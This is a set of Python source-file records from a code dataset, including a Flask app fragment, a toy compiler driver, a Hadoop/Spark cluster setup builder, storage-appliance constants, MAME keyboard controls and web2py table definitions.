'%s.zip' % argusername\n data = self.open_resource(zippath).read()\n response = make_response(data)\n response.headers['Content-Type'] = 'application/zip'\n response.headers['Content-Disposition'] = \\\n 'inline; filename=%s' % zipname\n return response\n \n\n def 
pdfresponse(self, fpath, fname):\n with self.open_resource(fpath) as f:\n data = f.read()\n response = make_response(data)\n response.headers['Content-Type'] = 'application/pdf'\n response.headers['Content-Disposition'] = \\\n 'inline; filename=%s.pdf' % fname\n return response\n\n\n def contest_links_live(self):\n tnow = datetime.datetime.utcnow()\n tlive = datetime.datetime(2018,8,22,22,0)\n islive = tnow >= tlive\n return islive\n\n def generate_password(self):\n return random.choice(self.wordlist)+random.choice(self.wordlist) \n\n def generate_username(self, firstname, lastname):\n firstname = filter(lambda x: x >= 'a' and x <= 'z', firstname.lower())\n lastname = filter(lambda x: x >= 'a' and x <= 'z', lastname.lower())\n candidate = firstname[:6] + lastname[:3]\n appendage = '' if len(candidate) != 0 else '1'\n if self.username_exists(candidate+str(appendage)):\n appendage = 1\n while self.username_exists(candidate+str(appendage)):\n appendage += 1\n return candidate + str(appendage)\n\n def username_exists(self, uname):\n return (Student.query.filter_by(username=uname).first() is not None or\n Deleted.query.filter_by(username=uname).first() is not None)\n\n def init_db(self):\n db.init_app(self)\n db.app = self # slight hack to work around flask's context \"feature\"\n db.create_all()\n db.session.commit()\n","sub_path":"aioregister/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":18035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"611715447","text":"#65. Print the summation of the cosine Taylor series:\n\n\ndef fact(n): # iterative factorial helper\n fact = 1\n while n > 0:\n fact*=n\n n = n - 1\n return fact\nn=int(input(\"enter the number of term :\"))\nx=int(input(\"enter the value of x:\"))\nsum=1\nfor i in range (1,n+1):\n sum = sum + ((((-1)**i)) * (x**(2*i))) / fact(2*i) # add the i-th term of the cosine Taylor series\nprint(sum)","sub_path":"PythonPrograms/python_program/cos_series_sumation.py","file_name":"cos_series_sumation.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"635195599","text":"#!/usr/bin/env python3\n\n\"\"\"The main function of the compiler, AKA the compiler driver\"\"\"\n\nimport lexer\nimport parser\nfrom support import *\nfrom datalayout import *\nfrom cfg import *\nfrom regalloc import *\nfrom codegen import *\n\n\ndef compile_program(text):\n lex = lexer.Lexer(text)\n pars = parser.Parser(lex)\n res = pars.program()\n print('\\n', res, '\\n')\n\n return  # early exit for debugging; the rest of the pipeline below is currently disabled\n res.navigate(print_stat_list)\n\n node_list = get_node_list(res)\n for n in node_list:\n print(type(n), id(n), '->', type(n.parent), id(n.parent))\n print('\\nTotal nodes in IR:', len(node_list), '\\n')\n\n res.navigate(lowering)\n\n node_list = get_node_list(res)\n print('\\n', res, '\\n')\n for n in node_list:\n print(type(n), id(n))\n try:\n n.flatten()\n except Exception:\n pass\n # res.navigate(flattening)\n print('\\n', res, '\\n')\n\n print_dotty(res, \"log.dot\")\n\n print(\"\\n\\nDATALAYOUT\\n\\n\")\n perform_data_layout(res)\n print('\\n', res, '\\n')\n\n cfg = CFG(res)\n cfg.liveness()\n cfg.print_liveness()\n cfg.print_cfg_to_dot(\"cfg.dot\")\n\n print(\"\\n\\nREGALLOC\\n\\n\")\n ra = LinearScanRegisterAllocator(cfg, 11)\n reg_alloc = ra()\n print(reg_alloc)\n\n print(\"\\n\\nCODEGEN\\n\\n\")\n code = generate_code(res, reg_alloc)\n print(code)\n\n return code\n\n\ndef driver_main():\n from lexer 
import __test_program\n test_program=__test_program\n import sys\n print(sys.argv)\n if len(sys.argv) >= 2:\n with open(sys.argv[1], 'r') as inf :\n test_program = inf.read()\n code = compile_program(test_program)\n\n if len(sys.argv) > 2:\n with open(sys.argv[-1], 'w') as outf :\n outf.write(code)\n\n\nif __name__ == '__main__':\n driver_main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"79533341","text":"from __future__ import annotations\nimport os\nfrom pathlib import Path\nimport shutil\nfrom urllib.request import urlretrieve\nimport tarfile\nfrom typing import Tuple\nfrom argparse import Namespace\nimport threading\nfrom abc import ABC\nimport re\nfrom constants import HasConstants\n\n\nclass HasComponentBaseDirectory:\n @property\n def component_base_dir(self) -> str:\n raise NotImplementedError(\"Base class not implement base_dir\")\n\n\nclass HasData:\n @property\n def data(self) -> dict:\n raise NotImplementedError(\"Base class not implement data\")\n\n\nclass FileDiscoverable:\n @staticmethod\n def discover(dir_path: str, regex_pattern: str) -> list[Path]:\n paths = []\n pattern = re.compile(regex_pattern)\n for file_or_dir in Path(dir_path).rglob(\"*\"):\n if file_or_dir.is_file() and pattern.match(str(file_or_dir.name)):\n paths.append(file_or_dir)\n return paths\n\n\nclass DestinationFigurable(HasConstants):\n def get_dest(self, src: str) -> Path:\n relative_path = src[len(self.BASE_PATH):]\n return Path(self.TARGET_BASE_PATH + relative_path)\n\n\nclass TemplateRequired(HasComponentBaseDirectory, FileDiscoverable, DestinationFigurable):\n\n @property\n def template_files(self) -> list[Path]:\n dir_to_traverse = os.path.join(self.BASE_PATH, Path(self.component_base_dir).name)\n pattern = \".*\\\\.{EXTENSION}$\".format(EXTENSION=self.TEMPLATE_EXTENSION)\n return self.discover(dir_to_traverse, pattern)\n\n def do_template(self, engine, data) -> None:\n for to_template in self.template_files:\n content = engine.render(to_template, data)\n dest = Path(os.path.splitext(self.get_dest(str(to_template)))[0])\n dest.parent.mkdir(parents=True, exist_ok=True)\n with open(str(dest), \"w\") as f:\n f.write(content)\n if str(dest.suffix) in [\".sh\", \".py\"]:\n os.chmod(dest, 0o755)\n\n\nclass FilesCopyRequired(ABC, HasComponentBaseDirectory, FileDiscoverable, DestinationFigurable):\n @property\n def files_to_copy(self) -> list[Path]:\n dir_to_traverse = os.path.join(self.BASE_PATH, Path(self.component_base_dir).name)\n pattern = \"(?!.*\\\\.{EXTENSION}$)\".format(EXTENSION=self.TEMPLATE_EXTENSION)\n return self.discover(dir_to_traverse, pattern)\n\n def copy(self) -> None:\n for to_copy in self.files_to_copy:\n dest = self.get_dest(str(to_copy))\n dest.parent.mkdir(parents=True, exist_ok=True)\n shutil.copy2(to_copy, dest)\n if str(dest.suffix) in [\".sh\", \".py\"]:\n os.chmod(dest, 0o755)\n\n\nclass DownloadRequired(HasComponentBaseDirectory, HasConstants):\n def __init__(self, force_download: bool):\n self.force_download = force_download\n\n def download_async(self) -> list[threading.Thread]:\n Path(self.component_base_dir).mkdir(parents=True, exist_ok=True)\n links = self.links_to_download\n awaitables = []\n for i in range(0, len(links)):\n link, output_file = links[i]\n download_func = self._download\n if not self.force_download and Path(output_file).exists():\n download_func = self._dummy_download\n\n 
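# NOTE: the Thread objects are only created here, not started; the caller is expected to start and join them.\n 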
awaitables.append(threading.Thread(target=download_func,\n args=(link, output_file)))\n return awaitables\n\n @staticmethod\n def _dummy_download(url: str, output_file: Path) -> None:\n print(\"Download from {URL} is ignored as {PATH} already exists\".format(URL=url, PATH=str(output_file)))\n return\n\n @staticmethod\n def _download(url: str, output_file: Path) -> None:\n print(\"Downloading from {SOURCE} to {DESTINATION}\".format(SOURCE=url, DESTINATION=output_file))\n urlretrieve(url, filename=output_file)\n\n @property\n def links_to_download(self) -> list[Tuple[str, Path]]:\n raise NotImplementedError(\"Base class not implement links_to_download\")\n\n\nclass DecompressRequired:\n def decompress_async(self) -> list[threading.Thread]:\n awaitables = []\n for compressed, dest in self.files_to_decompress:\n decompress_func = self._decompress\n if dest.exists():\n decompress_func = self._dummy_decompress\n\n awaitables.append(threading.Thread(target=decompress_func, args=(compressed, dest)))\n return awaitables\n\n @staticmethod\n def _dummy_decompress(compressed: Path, dest_path: Path) -> None:\n print(\"Decompressing {COMPRESSED} is ignored as {PATH} already exists\".format(\n COMPRESSED=str(compressed), PATH=str(dest_path)))\n return\n\n @staticmethod\n def _decompress(compressed: Path, dest_path: Path) -> None:\n dest_path.mkdir(parents=True, exist_ok=True)\n with tarfile.open(Path(compressed)) as f:\n f.extractall(dest_path)\n\n @property\n def files_to_decompress(self) -> list[Tuple[Path, Path]]:\n raise NotImplementedError(\"Base class not implement decompress\")\n\n\nclass Component(ABC):\n pass\n\n\nclass Scripts(Component, TemplateRequired):\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"bin\")\n\n @property\n def data(self) -> dict:\n return {}\n\n\nclass ClusterStarter(Component, FilesCopyRequired, TemplateRequired, HasData, HasConstants):\n\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"cluster-starter\")\n\n @property\n def data(self) -> dict:\n return {\n \"additional\": {\n \"image\": {\n \"cluster-starter\": self.CLUSTER_STARTER_IMAGE_NAME\n }\n }\n }\n\n\nclass Hue(Component, FilesCopyRequired, TemplateRequired, HasData):\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"hue\")\n\n @property\n def data(self) -> dict:\n return {\n \"hue\": {\n \"db-user\": \"hue\", \"db-password\": \"hue\", \"db-name\": \"hue\", \"db-host\": \"cluster-db\", \"db-port\": \"5432\"\n }\n }\n\n\nclass Hadoop(Component, FilesCopyRequired, TemplateRequired, DownloadRequired, DecompressRequired, HasData, HasConstants):\n TAR_FILE_NAME = \"hadoop.tar.gz\"\n PREDEF_GROUPS = {\n \"admin\": 150, \"hadoop\": 151, \"hadoopsvc\": 152, \"usersvc\": 154, \"dataplatform_user\": 155, \"hadoopUser\":156,\n \"bi_user_group\": 157, \"ml_user_group\": 158, \"de_user_group\": 159\n }\n\n PREDEF_USERS = {\n \"hdfs\": {\"uid\": 180, \"groups\": [\"admin\"], \"isSvc\": True, \"proxyGroup\": \"*\"},\n \"webhdfs\": {\"uid\": 181, \"groups\": [\"admin\"], \"isSvc\": True, \"proxyGroup\": \"*\"},\n \"hive\": {\"uid\": 182, \"groups\": [\"hadoopsvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"hadoopUser\"},\n \"hue\": {\"uid\": 183, \"groups\": [\"hadoopsvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"hadoopUser\"},\n \"spark\": {\"uid\": 184, \"groups\": [\"hadoopsvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"hadoopUser\"},\n \"bi_user\": 
{\"uid\": 185, \"groups\": [\"dataplatform_user\", \"hadoopUser\", \"bi_user_group\"], \"isSvc\": False},\n \"bi_svc\": {\"uid\": 186, \"groups\": [\"usersvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"bi_user_group\"},\n \"ml_user\": {\"uid\": 187, \"groups\": [\"dataplatform_user\", \"hadoopUser\", \"ml_user_group\"], \"isSvc\": False},\n \"ml_svc\": {\"uid\": 188, \"groups\": [\"usersvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"ml_user_group\"},\n \"de_user\": {\"uid\": 189, \"groups\": [\"dataplatform_user\", \"hadoopUser\", \"de_user_group\"], \"isSvc\": False},\n \"de_svc\": {\"uid\": 190, \"groups\": [\"usersvc\", \"hadoopUser\"], \"isSvc\": True, \"proxyGroup\": \"de_user_group\"}\n }\n\n def __init__(self, args: Namespace):\n DownloadRequired.__init__(self, force_download=args.force_download_hadoop)\n self.hadoop_version = args.hadoop_version\n self.java_version = args.java_version\n self.num_datanode = args.num_datanode\n\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"hadoop\")\n\n @property\n def links_to_download(self) -> list[Tuple[str, Path]]:\n return [\n (\"https://github.com/dev-moonduck/hadoop/releases/download/v{HADOOP_VERSION}/hadoop-{HADOOP_VERSION}.tar.gz\"\n .format(HADOOP_VERSION=self.hadoop_version),\n Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)))\n ]\n\n @property\n def files_to_decompress(self) -> list[Tuple[Path, Path]]:\n return [\n (Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)),\n Path(os.path.join(self.component_base_dir, \"hadoop-bin\")))\n ]\n\n @property\n def data(self) -> dict:\n return {\n \"primary_namenode\": {\n \"host\": \"primary-namenode\", \"rpc-port\": \"9000\", \"http-port\": \"9870\"\n },\n \"secondary_namenode\": {\n \"host\": \"secondary-namenode\", \"rpc-port\": \"9000\", \"http-port\": \"9870\"\n },\n \"journalnode\": {\"host\": [\"journalnode1\", \"journalnode2\", \"journalnode3\"], \"port\": \"8485\"},\n \"zookeeper\": {\"host\": [\"zookeeper1\", \"zookeeper2\", \"zookeeper3\"], \"port\": \"2181\"},\n \"yarn_history\": {\"host\": \"yarn-history\", \"port\": \"8188\"},\n \"resource_manager\": {\n \"host\": \"resource-manager\", \"port\": \"8032\", \"web-port\": \"8088\", \"resource-tracker-port\": \"8031\",\n \"scheduler-port\": \"8030\"\n },\n \"datanode\": {\n \"host\": list(map(lambda i: \"datanode\" + str(i), range(1, self.num_datanode + 1))),\n \"rpc-port\": \"9864\", \"nodemanager-port\": \"8042\"\n },\n \"additional\": {\n \"users\": self.PREDEF_USERS, \"groups\": self.PREDEF_GROUPS,\n \"dependency-versions\": {\n \"hadoop\": self.hadoop_version, \"java\": self.java_version\n },\n \"agent\": {\n \"port\": \"3333\"\n },\n \"image\": {\n \"hadoop\": self.HADOOP_IMAGE_NAME\n }\n }\n }\n\n\nclass Hive(Component, FilesCopyRequired, TemplateRequired, DownloadRequired, DecompressRequired, HasData):\n TAR_FILE_NAME = \"hive.tar.gz\"\n\n def __init__(self, args: Namespace):\n DownloadRequired.__init__(self, force_download=args.force_download_hive)\n self.hive_version = args.hive_version\n\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"hive\")\n\n @property\n def links_to_download(self) -> list[Tuple[str, Path]]:\n return [\n ((\"https://github.com/dev-moonduck/hive/releases/download/v{HIVE_VERSION}\"\n + \"/apache-hive-{HIVE_VERSION}.tar.gz\").format(HIVE_VERSION=self.hive_version),\n Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)))\n ]\n\n @property\n def 
files_to_decompress(self) -> list[Tuple[Path, Path]]:\n return [\n (Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)),\n Path(os.path.join(self.component_base_dir, \"hive-bin\")))\n ]\n\n @property\n def data(self) -> dict:\n return {\n \"hive_server\": {\"host\": \"hive-server\", \"thrift-port\": \"10000\", \"http-port\": \"10001\"},\n \"hive_metastore\": {\"host\": \"hive-metastore\", \"thrift-port\": \"9083\", \"metastore-db-host\": \"cluster-db\",\n \"metastore-db-port\": \"5432\", \"metastore-db-name\": \"metastore\",\n \"metastore-db-user\": \"hive\", \"metastore-db-password\": \"hive\"},\n \"additional\": {\n \"dependency-versions\": {\n \"hive\": self.hive_version\n }\n }\n }\n\n\nclass Spark(Component, FilesCopyRequired, TemplateRequired, DownloadRequired, DecompressRequired, HasData):\n TAR_FILE_NAME = \"spark.tar.gz\"\n\n def __init__(self, args: Namespace):\n DownloadRequired.__init__(self, force_download=args.force_download_spark)\n self.spark_version = args.spark_version\n self.scala_version = args.scala_version\n self.hadoop_version = args.hadoop_version\n\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"spark\")\n\n @property\n def links_to_download(self) -> list[Tuple[str, Path]]:\n return [(\n (\"https://github.com/dev-moonduck/spark/releases/download/v{SPARK_VERSION}-{SCALA_VERSION}-{HADOOP_VERSION}\"\n + \"/spark-{SPARK_VERSION}-{SCALA_VERSION}-{HADOOP_VERSION}.tar.gz\").format(\n SPARK_VERSION=self.spark_version, SCALA_VERSION=self.scala_version, HADOOP_VERSION=self.hadoop_version),\n Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)))\n ]\n\n @property\n def files_to_decompress(self) -> list[Tuple[Path, Path]]:\n return [\n (Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)),\n Path(os.path.join(self.component_base_dir, \"spark-bin\")))\n ]\n\n @property\n def data(self) -> dict:\n return {}\n\n\nclass SparkHistory(Component, TemplateRequired, FilesCopyRequired, HasData):\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"spark-history\")\n\n @property\n def data(self) -> dict:\n return {\n \"spark_history\": {\"host\": \"spark-history\", \"port\": \"18080\"}\n }\n\n\nclass SparkThrift(Component, TemplateRequired, FilesCopyRequired, HasData):\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"spark-thrift\")\n\n @property\n def data(self) -> dict:\n return {\n \"spark_thrift\": {\"host\": \"spark-thrift\", \"thrift-port\": \"10010\", \"http-port\": \"10011\"}\n }\n\n\nclass Presto(Component, FilesCopyRequired, TemplateRequired, DownloadRequired, DecompressRequired, HasData):\n TAR_FILE_NAME = \"presto.tar.gz\"\n\n def __init__(self, args: Namespace):\n DownloadRequired.__init__(self, force_download=args.force_download_presto)\n self.presto_version = args.presto_version\n self.num_worker = args.num_presto_worker\n\n @property\n def component_base_dir(self) -> str:\n return os.path.join(self.TARGET_BASE_PATH, \"presto\")\n\n @property\n def links_to_download(self) -> list[Tuple[str, Path]]:\n return [\n ((\"https://github.com/dev-moonduck/presto/releases/download/v{PRESTO_VERSION}\"\n + \"/presto-server-{PRESTO_VERSION}.tar.gz\").format(PRESTO_VERSION=self.presto_version),\n Path(os.path.join(self.component_base_dir, self.TAR_FILE_NAME)))\n ]\n\n @property\n def files_to_decompress(self) -> list[Tuple[Path, Path]]:\n return [\n (Path(os.path.join(self.component_base_dir, 
self.TAR_FILE_NAME)),\n Path(os.path.join(self.component_base_dir, \"presto-bin\")))\n ]\n\n @property\n def data(self) -> dict:\n return {\n \"presto_server\": {\"host\": \"presto-server\", \"port\": \"8081\"}\n }\n\n\nclass ComponentFactory:\n @staticmethod\n def get_components(args: Namespace) -> list[Component]:\n components = [Scripts(), ClusterStarter(), Hadoop(args)]\n if args.hive or args.all:\n components.append(Hive(args))\n if args.spark_thrift or args.spark_history or args.all:\n components.append(Spark(args))\n if args.spark_history or args.all:\n components.append(SparkHistory())\n if args.spark_thrift or args.all:\n components.append(SparkThrift())\n if args.presto or args.all:\n components.append(Presto(args))\n if args.hue or args.all:\n components.append(Hue())\n return components\n","sub_path":"component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":15890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"183753282","text":"#! /usr/bin/env python3\n\nimport sys\n\nresistor_colours = [\"black\" ,\"brown\", \"red\", \"orange\", \"yellow\", \"green\", \"blue\" ,\"violet\", \"grey\", \"gold\", \"silver\"]\n\nif len(sys.argv) == 1:\n for colour in range(0, 11):\n print(resistor_colours[colour])\nelif len(sys.argv) == 6:\n # read the band colours only once enough arguments are present, to avoid an IndexError\n first_band = sys.argv[1]\n second_band = sys.argv[2]\n third_band = sys.argv[3]\n tolerance = sys.argv[4]\n print (\"yo!\")\nelse:\n print(\"enter entire value\")\n","sub_path":"exercises/04-resistor-value-calculator.py","file_name":"04-resistor-value-calculator.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"544148228","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n#\n# Copyright 2013 Mellanox Technologies, Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n# VSA Constants\n\nERR_TWISTED = 3\nERR_HA_SLAVE = 11\nERR_HA_TRANSITION = 12\nERR_COMPUTE_NODE = 13\nERR_LOADPVD = 15\nERR_LOADPVD_LO = 17\n\n# Data refresh period in seconds, 0 means no periodic refresh\nREFRESH_PERIOD = 60\n\n# Communication ports\nSANSRV_XMLRPC_PORT = 7080\nVSAD_XMLRPC_PORT = 7081\nMANHOLE_PORT = 7082\n\n# Timeout for vsad rpc connections\nVSAD_RPC_TIMEOUT = 30\n\nMANHOLE_CREDENTIALS = { 'admin': '123456' }\nWEBPORTAL_CREDENTIALS = { 'admin': '123456' 
}\nparamopts=['vendor_id','product_id','product_rev','scsi_id','scsi_sn','removable','mode_page','sense_format','online','path','direct']\niSCSIOpts=['MaxRecvDataSegmentLength','MaxXmitDataSegmentLength','DataDigest','HeaderDigest'\n,'InitialR2T','MaxOutstandingR2T','ImmediateData','FirstBurstLength','MaxBurstLength',\n'DataPDUInOrder','DataSequenceInOrder','ErrorRecoveryLevel','IFMarker','OFMarker','DefaultTime2Wait',\n'DefaultTime2Retain','OFMarkInt','IFMarkInt','MaxConnections','RDMAExtensions','TargetRecvDataSegmentLength'\n,'InitiatorRecvDataSegmentLength','MaxOutstandingUnexpectedPDUs']\n\nshowlist=['system','config','log','version','cache','fctree']\n\n# Enums\nfrom enum import Enum\nTransport = Enum('iser', 'iscsi')\nOsType = Enum('unknown', 'linux', 'windows', 'vmware', 'other')\nObjState = Enum('unknown', 'created', 'running', 'blocked', 'error', 'absent', 'down',\n 'offline', 'degraded', 'delete', 'slaved', 'other')\n\ndef IsRunning(obj):\n \"\"\"\n Return True if the object is in a running or degraded state.\n @param obj\n @return\n \"\"\"\n return (obj.state==ObjState.running or obj.state==ObjState.degraded)\n\nReqState=Enum('enabled','disabled','error')\nClusterState=Enum('master','standby','slave','none','disabled','local','transition','standalone','compute')\nRaidLevel=Enum('none','0','1','5','6','10','dr','linear')\nCachePolicy=Enum('fifo','lru')\nIoSchedType=Enum('default','noop','cfq','deadline','anticipatory')\nQualityType=Enum('unknown','slow','average','fast','fastest')\nAlarmType=Enum('add', 'delete', 'state_change', 'error')\n\n\n# Flash Cache\nCACHEVGN = 'cache.vg' # name of the cache volume group\nCACHESEP = '._.' # replace the ':' char\nCACHEPFX = 'vcache.' # VSA flashcache prefix\nCACHECMDS = 'zero_stats','do_sync','stop_sync','reclaim_policy','write_merge','dirty_thresh_pct','fast_remove','fallow_delay'\n\n# constants for disk stats\nRDIO=0\nRDSEC=1\nRDWAIT=2\nRDMRG=3\nWRIO=4\nWRSEC=5\nWRWAIT=6\nWRMRG=7\n\n# log menu options\nlogopt=['agent','audit','event','tgt','webportal']\n\n# error return codes\nILLEGAL_EXT_NAME = 2\nEXT_IS_LOCKED = 3\nEXT_NOT_FOUND = 4\nEXT_NOT_RUNNING = 5\nEXT_IS_PRIVATE = 6\nEXT_NOT_ENABLED = 7\n\n# SNMP\nSNMP_TRAP_PORT = 162\nSNMP_TRAP_COMMUNITY = 'public'\n","sub_path":"src/vsa/infra/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"334223867","text":"\"\"\"A module for keyboard presses emulation.\n\nAs MAME does not always register single presses with pyautogui, certain functions perform multiple presses to\ncircumvent that.\n\nWARNING: MAME does not accept keyboard emulators on Windows as of more recent versions (MacOS works,\nLinux not tested). 
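This is apparently because pyautogui injects synthetic key events, which MAME's raw input handling may ignore.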
To fix that, a custom version of MAME with DIRECT_INPUT enabled must be used.\n\"\"\"\n\nimport pyautogui\n\n\ndef move_car_in_direction(direction):\n for key in possible_keys_for_move:\n if keys_for_direction[direction] and key in keys_for_direction[direction]:\n pyautogui.keyDown(key)\n else:\n pyautogui.keyUp(key)\n\n\ndef exit_game():\n pyautogui.press(\"esc\", interval=0.1)\n pyautogui.press(\"esc\", interval=0.1)\n\n\ndef restart_game():\n pyautogui.press(\"f3\", interval=0.1)\n pyautogui.press(\"f3\", interval=0.1)\n\n\ndef insert_coin():\n pyautogui.press(\"5\", interval=0.1)\n pyautogui.press(\"5\", interval=0.1)\n pyautogui.press(\"5\", interval=0.1)\n\n\nkeys_for_direction = {\n 'L': ['left'],\n 'R': ['right'],\n 'F': ['up'],\n 'FR': ['up', 'right'],\n 'FL': ['up', 'left'],\n 'S': None\n}\n\npossible_keys_for_move = ['up', 'left', 'right']\n","sub_path":"src/gamecontrols.py","file_name":"gamecontrols.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"98082588","text":"def fields_template():\n\n alldefs = dict()\n dblink = 'integer'\n\n #alldefs[\"TblAdmins\"] = dict(\n #IIDD='string',\n #Name='string',\n #Password='string',\n #)\n\n alldefs[\"TblDefaults\"] = dict(\n IIDD='integer',\n AdminMaxResultsInPage='integer',\n UserMaxResultsInPage='integer',\n PhotosInMember='integer',\n PhotosInEvent='integer',\n NormalPhotoWidth='integer',\n ThumbnailPhotoWidth='integer',\n AdminThumbnailPhotoHeight='integer',\n UserMaxRandomEventsInMainPage='integer',\n PageHitsCountingStatus='integer',\n CommentsEmailName='string',\n CommentsEmailAddress='string',\n IdentifyEmailName='string',\n IdentifyEmailAddress='string',\n MailHost='string',\n MailPort='integer',\n MailFromAddress='string',\n MailFromName='string',\n UserMaxPhotosInUnidentifiedPage='integer',\n AdminHrefInitialAddress='string',\n )\n\n #alldefs[\"TblDocuments\"] = dict(\n #IIDD='string',\n #ArchiveNum='string',\n #DocumentDate='string',\n #Description='string',\n #LocationInDisk='string',\n #StatusID='string',\n #)\n\n #alldefs[\"TblEventDocuments\"] = dict(\n #EventID='string',\n #DocumentID='string',\n #EventDocumentRank='string',\n #)\n\n alldefs[\"TblEventMembers\"] = dict(\n EventID=dblink,\n MemberID=dblink,\n EventMemberRank='integer',\n )\n\n alldefs[\"TblEventPhotos\"] = dict(\n EventID=dblink,\n PhotoID=dblink,\n EventPhotoRank='integer',\n )\n\n alldefs[\"TblEventTypes\"] = dict(\n IIDD=dblink,\n Name='string',\n Description='string',\n ImageName='string',\n )\n\n alldefs[\"TblEvents\"] = dict(\n IIDD=dblink,\n Name='string',\n SSource='string',\n EventDate='string', #may be missing, just year, years range or true date\n Place='string',\n Description='string',\n KeyWords='string',\n EventRank='integer',\n TypeID=dblink, #db.TblEventTypes\n ObjectID=dblink, #db.TblObjects\n StatusID=dblink, #db.TblStatuses\n PageHits='integer',\n DescriptionNoHtml='string',\n )\n\n alldefs[\"TblFamilyConnectionTypes\"] = dict(\n IIDD=dblink,\n Description='string',\n )\n\n #alldefs[\"TblHrefCategories\"] = dict(\n #IIDD='string',\n #Name='string',\n #CategoryRank='string',\n #)\n\n #alldefs[\"TblHrefCategoryCategories\"] = dict(\n #ChildCategoryID='string',\n #ParentCategoryID='string',\n #ChildHierarchyLevel='string',\n #)\n\n alldefs[\"TblHrefCategoryHrefs\"] = dict(\n HrefID=dblink, #db.Tbl???\n CategoryID='string',\n )\n\n alldefs[\"TblHrefTypes\"] = dict(\n IIDD=dblink,\n Name='string',\n )\n\n #alldefs[\"TblHrefs\"] = dict(\n 
#IIDD='string',\n #Name='string',\n #Description='string',\n #Href='string',\n #HrefTypeID='string',\n #HrefRank='string',\n #DescriptionNoHtml='string',\n #)\n\n #alldefs[\"TblJokes\"] = dict(\n #IIDD='string',\n #Description='string',\n #)\n\n alldefs[\"TblMemberConnections\"] = dict(\n IIDD=dblink,\n MemberID=dblink, #db.TblMembers\n ConnectToMemberID=dblink, #db.TblMembers\n ConnectionTypeID=dblink, #db.TblFamilyConnectionTypes\n Name='string',\n DateOfBirth='string', #redundant\n PlaceOfBirth='string',\n Professions='string',\n )\n\n #alldefs[\"TblMemberDocuments\"] = dict(\n #MemberID='string',\n #DocumentID='string',\n #MemberDocumentRank='string',\n #)\n\n alldefs[\"TblMemberPhotos\"] = dict(\n MemberID=dblink, #db.TblMembers\n PhotoID=dblink, #db.TblMembers\n MemberPhotoRank='integer',\n )\n\n alldefs[\"TblMembers\"] = dict(\n IIDD=dblink,\n Name='string',\n FormerName='string',\n DateOfBirth='string', #may be missing, year or range...\n PlaceOfBirth='string',\n DateOfAlia='string', #missing or year\n DateOfMember='string', #missing or year\n Education='string', #drop it\n Institute='string', #drop it\n Professions='string', #drop it\n LifeStory='text',\n KeyWords='string',\n ObjectID=dblink, #db.TblObjects. probably redundant\n NickName='string',\n StatusID=dblink, #db.TblStatuses\n PageHits='integer',\n LifeStoryNoHtml='text',\n )\n\n alldefs[\"TblObjects\"] = dict(\n IIDD=dblink,\n Description='string',\n Priority='integer',\n HebrewDescription='string',\n )\n\n alldefs[\"TblPhotos\"] = dict(\n IIDD=dblink,\n ArchiveNum='string',\n PhotoDate='string', #range, year, etc.\n Name='string',\n Description='string',\n Photographer='string',\n KeyWords='string',\n LocationInDisk='string',\n PhotoRank='integer',\n ObjectID=dblink, #db.TblObjects\n Recognized='boolean',\n StatusID=dblink, #db.TblStatuses\n PageHits='integer',\n DescriptionNoHtml='string',\n )\n\n alldefs[\"TblStatuses\"] = dict(\n IIDD=dblink,\n Name='string',\n )\n\n alldefs[\"TblSuperAdmins\"] = dict(\n IIDD=dblink,\n Name='string',\n Password='string',\n )\n\n #alldefs[\"TblSuperAdminsNickNames\"] = dict(\n #IIDD='string',\n #NickName='string',\n #)\n\n alldefs[\"TblTerms\"] = dict(\n IIDD=dblink,\n Name='string',\n TermTranslation='string',\n Background='string',\n InventedBy='string',\n InventedByMemberID=dblink, #db.TblMembers\n ObjectID=dblink, #db.TblObjects\n StatusID=dblink, #db.TblStatuses\n PageHits='integer',\n 